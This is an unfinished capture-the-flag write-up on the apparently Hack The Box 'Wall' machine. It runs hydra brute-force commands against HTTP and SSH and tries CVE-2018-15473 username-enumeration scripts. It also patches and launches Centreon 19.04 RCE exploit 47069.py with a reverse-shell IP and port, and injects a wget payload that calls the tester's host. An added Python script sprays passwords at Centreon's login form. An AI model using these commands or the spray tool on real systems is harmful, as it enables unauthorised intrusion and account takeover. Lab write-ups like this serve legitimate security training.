Wall: RCE and WAF bypass (Part 1)

References:

I've been too busy lately, orz, so this post isn't finished yet...

enumeration

Open ports: 22, 80

Apache/2.4.29 (Ubuntu) Server


This suggests the username may be admin.

cd /usr/share/wordlists
hydra -l admin -P rockyou.txt -s 80 -f 10.10.10.157 http-get /monitoring

hydra -l admin -P 3000-pass.txt -s 80 -f 10.10.10.157 http-get /monitoring
hydra -l panel -P rockyou.txt -s 80 -f 10.10.10.157 http-get /monitoring
hydra -l aa -P rockyou.txt -s 80 -f 10.10.10.157 http-get /monitoring

ssh

OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)


OpenSSH 7.6 is older than 7.7, so the username-enumeration PoCs (CVE-2018-15473) apply, but none of them run cleanly (the TypeErrors are typical of running these scripts against a newer paramiko than they were written for):

searchsploit -m exploits/linux/remote/45233.py
python 45233.py (fails with a TypeError in the exploit code)

searchsploit -m exploits/linux/remote/45210.py
python 45210.py (TypeError)

searchsploit -m exploits/linux/remote/45939.py
python 45939.py --port 22 10.10.10.157 root (TypeError: an integer is required)


hydra -l admin -P rockyou.txt 10.10.10.157 ssh

web

enumeration

dirb http://10.10.10.157 -X .php
Paths found:
http://10.10.10.157/aa.php
http://10.10.10.157/monitoring/
http://10.10.10.157/panel.php
http://10.10.10.157/centreon

nikto -h http://10.10.10.157
Allowed HTTP methods: GET, POST, OPTIONS, HEAD


No directory traversal found:

10.10.10.157/monitoring/../panel.php

redirects to panel.php

10.10.10.157/monitoring/../../../../../../../../../etc/passwd
no effect


Changing the request from GET to POST bypasses the login page.

searchsploit centreon

searchsploit -m exploitdb/exploits/php/webapps/47069.py
targets v. 19.04.0

Exploit download link:

python3.6 47069.py http://10.10.10.157/centreon admin passwd1 10.10.14.10 1330

Running it throws an error, so I modified the exploit.

...
poller_soup = BeautifulSoup(poller_html)
Traceback (most recent call last):
File "47069.py", line 57, in <module>
poller_token = poller_soup.findAll('input')[24].get("value")
IndexError: list index out of range

The exploit reads the token by a hard-coded position in the list of inputs, and this page has fewer inputs than the exploit author's. Look the field up by name instead:

poller_token = poller_soup.find('input', {'name': 'centreon_token'}).get('value')

python3 centreon-exploit.py http://10.10.10.157/centreon admin passwd1 IP 8080

The reverse shell fails.

Modified exploit that runs without errors: https://github.com/Whale3070/ctf-coding/blob/master/47069.py

WAF bypass

python3 47069.py http://10.10.10.157/centreon admin password1 10.10.14.18 8081


http://10.10.10.157/centreon/Themes/Centreon-2/


Directory listing is enabled (Apache directory index)


http://10.10.10.157/centreon/main.get.php?p=60901
http://10.10.10.157/centreon/include/configuration/configGenerate/xml/generateFiles.php


To test whether command execution succeeds, change the payload to:

wget http://10.10.14.10:888/1.txt #

Failed.


hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt -V -s 80 10.10.10.157 http-post-form "/centreon/index.php:useralias=^USER^&password=^PASS^&submitLogin=Connect&centreon_token=d9ab2ad282b929cf8f32486cee14da85:Your credentials are incorrect."

hydra -l centreon -P /usr/share/wordlists/rockyou.txt -V -s 80 10.10.10.157 http-post-form "/centreon/index.php:useralias=^USER^&password=^PASS^&submitLogin=Connect&centreon_token=d9ab2ad282b929cf8f32486cee14da85:Your credentials are incorrect."

hydra -l admin -P /usr/share/wordlists/rockyou.txt -V -s 80 10.10.10.157 http-post-form "/centreon/index.php:useralias=^USER^&password=^PASS^&submitLogin=Connect&centreon_token=d9ab2ad282b929cf8f32486cee14da85:Your credentials are incorrect." -t 4

Results:

admin/password1
centreon/#1bitch
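Two spots above fit one worked example: the IndexError in 47069.py, fixed by looking the token up by name instead of by position, and the hydra http-post-form runs, which send one fixed centreon_token with every guess. The code below is an added example, not code from this post, from 47069.py or from Centreon. It extracts the token with the standard library only, and logs in with a fresh GET (new session cookie plus token) before every POST. Whether Centreon rejects a token that came from a different session is not something this post checks; the constructed FakeCentreon stand-in models the strict case (an assumption, not documented behaviour), and fetching the token per attempt works either way.

```python
"""Added example (assumptions: Centreon binds centreon_token to the PHP
session that rendered the form; FakeCentreon is a constructed stand-in)."""
import secrets
from html.parser import HTMLParser
from typing import Callable, Dict, Iterable, Optional, Tuple

Response = Tuple[int, str, Dict[str, str]]          # status, body, Set-Cookie
Transport = Callable[[str, str, Optional[Dict[str, str]], Dict[str, str]], Response]

FAIL_MARKER = "Your credentials are incorrect"      # the string hydra keys on


class FormInputs(HTMLParser):
    """Collect name -> value for every <input> on a page."""

    def __init__(self) -> None:
        super().__init__()
        self.inputs: Dict[str, str] = {}

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag != "input":
            return
        a = dict(attrs)
        if a.get("name"):
            self.inputs[a["name"]] = a.get("value") or ""


def centreon_token(html: str) -> str:
    """Same idea as soup.find('input', {'name': 'centreon_token'}): look the
    field up by name, so a form with fewer inputs than the exploit author saw
    can neither return the wrong field nor run off the end of the list."""
    p = FormInputs()
    p.feed(html)
    if "centreon_token" not in p.inputs:
        raise ValueError("no centreon_token input on page")
    return p.inputs["centreon_token"]


def try_login(http: Transport, user: str, password: str) -> bool:
    """One attempt = fresh GET (new session + token), then the POST."""
    _, page, cookies = http("GET", "/centreon/index.php", None, {})
    data = {"useralias": user, "password": password,
            "submitLogin": "Connect", "centreon_token": centreon_token(page)}
    status, body, _ = http("POST", "/centreon/index.php", data, cookies)
    return status in (200, 302) and FAIL_MARKER not in body


def spray(http: Transport, user: str, passwords: Iterable[str]) -> Optional[str]:
    """Return the first password that logs in, or None."""
    for pw in passwords:
        if try_login(http, user, pw):
            return pw
    return None


def replay_fixed_token(http: Transport, user: str, password: str) -> bool:
    """What the hydra command line above does: token copied from session A,
    POST sent without A's cookie (hydra keeps no cookie jar by default)."""
    _, page_a, _ = http("GET", "/centreon/index.php", None, {})
    token_a = centreon_token(page_a)
    _, _, cookies_b = http("GET", "/centreon/index.php", None, {})
    data = {"useralias": user, "password": password,
            "submitLogin": "Connect", "centreon_token": token_a}
    status, body, _ = http("POST", "/centreon/index.php", data, cookies_b)
    return status in (200, 302) and FAIL_MARKER not in body


class FakeCentreon:
    """Constructed offline stand-in for index.php: one token per session.
    Assumption: a token from another session fails like a wrong password."""

    def __init__(self, users: Dict[str, str]) -> None:
        self.users = users
        self.sessions: Dict[str, str] = {}      # PHPSESSID -> centreon_token

    def __call__(self, method, path, data, cookies) -> Response:
        if method == "GET":
            sid, tok = secrets.token_hex(8), secrets.token_hex(16)
            self.sessions[sid] = tok
            body = ('<form method="post"><input name="useralias">'
                    '<input type="password" name="password">'
                    f'<input type="hidden" name="centreon_token" value="{tok}">'
                    '<input type="submit" name="submitLogin" value="Connect"></form>')
            return 200, body, {"PHPSESSID": sid}
        expected = self.sessions.get(cookies.get("PHPSESSID", ""))
        ok = (data.get("centreon_token") == expected
              and self.users.get(data.get("useralias")) == data.get("password"))
        return (302, "", {}) if ok else (200, FAIL_MARKER + ".", {})


if __name__ == "__main__":
    srv = FakeCentreon({"admin": "password1"})
    print("spray:", spray(srv, "admin", ["123456", "password1", "letmein"]))
    print("fixed token replay:", replay_fixed_token(srv, "admin", "password1"))
```

The point of replay_fixed_token is that a stale token produces the same failure string as a wrong password, so hydra would silently report no hits even when the word list contains the right one; swapping FakeCentreon for a real transport built on urllib or requests keeps the rest of the code unchanged.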

Vulnerabilities present

Centreon 19.04 RCE
weak admin password on the backend
Apache directory listing

Exploiting the vulnerability manually, following the Python exploit

Vulnerabilities in version 19.04:
https://www.cvedetails.com/vulnerability-list/vendor_id-7565/product_id-12778/version_id-303583/Centreon-Centreon-19.04.0.html

Start Burp, then first visit http://10.10.10.157/centreon/main.php?p=60901&o=c&server_id=1


Note the testpath in the screenshot.

To be continued.